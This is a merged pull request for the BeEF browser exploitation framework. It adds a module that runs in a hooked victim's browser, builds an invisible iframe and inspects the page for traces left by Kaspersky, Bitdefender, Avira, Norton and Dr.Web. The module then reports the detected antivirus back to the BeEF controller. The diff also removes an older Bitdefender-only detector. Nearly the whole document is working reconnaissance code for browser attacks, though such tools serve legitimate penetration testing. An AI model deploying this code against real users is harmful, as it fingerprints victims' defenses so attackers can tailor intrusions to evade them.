Merge pull request #1315 from phosphore/master

add detect_antivirus module, merging the old bitdefender module

modules/host/detect_antivirus/command.js

@@ -0,0 +1,40 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    //Detection of av elements starts
+        var image = "<body><img src='x'/></body>";
+        var hidden_iframe = beef.dom.createInvisibleIframe();
+        hidden_iframe.setAttribute("id", "frmin");
+        document.body.appendChild(hidden_iframe);
+        var kaspersky_iframe = hidden_iframe.contentDocument || hidden_iframe.contentWindow.document;
+        kaspersky_iframe.open();
+        kaspersky_iframe.write(image);
+        kaspersky_iframe.close();
+
+        var frm = document.getElementById("frmin");
+        ka = frm.contentDocument.getElementsByTagName("html")[0].outerHTML;
+        var AV = document.getElementById("abs-top-frame");
+        var NAV = document.getElementById("coFrameDiv");
+    //Detection of av elements ends
+
+    if (ka.indexOf("kasperskylab_antibanner") !== -1)
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Kaspersky');
+    else if (ka.indexOf("netdefender/hui/ndhui.js") !== -1)
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Bitdefender');
+    else if (AV !== null) {
+        if (AV.outerHTML.indexOf('/html/top.html') >= 0 & AV.outerHTML.indexOf('chrome-extension://') >= 0)
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avira');
+    } else if (NAV !== null) {
+        var nort = NAV.outerHTML;
+        if (nort.indexOf('coToolbarFrame') >= 0 & nort.indexOf('/toolbar/placeholder.html') >= 0 & nort.indexOf('chrome-extension://') >= 0)
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Norton');
+    } else if (document.getElementsByClassName('drweb_btn').length > 0)
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=DrWeb');
+    else beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Not Detected');
+
+});

modules/host/detect_antivirus/config.yaml

@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        detect_bitdefender2012:
+        detect_antivirus:
             enable: true
             category: "Host"
-            name: "Detect Bit Defender 2012"
-            description: "This module detect the javascript code automatically included by Bitdefender 2012"
-            authors: ["nbblrr"]
+            name: "Detect Antivirus"
+            description: "This module detect the javascript code automatically included by some AVs (currently supports detection for Kaspersky, Avira, BitDefender, Norton, Dr. Web)"
+            authors: ["phosphore","vah13","nbblrr"]
             target:
                 working: ["ALL"]

modules/host/detect_antivirus/module.rb

@@ -4,10 +4,10 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-class Detect_bitdefender2012 < BeEF::Core::Command
+class Detect_antivirus < BeEF::Core::Command
 
   def post_execute
-    save({'BitDefender' => @datastore['bitdefender']})
+    save({'Antivirus' => @datastore['antivirus']})
   end
 
 end

modules/host/detect_bitdefender2012/command.js

@@ -1,17 +0,0 @@
-//
-// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-    var temp=document.body.innerHTML;
-    var key="netdefender/hui/ndhui.js";
-    if(temp.indexOf(key)>0) {
-        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
-    } else {
-        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
-    };
-
-});
-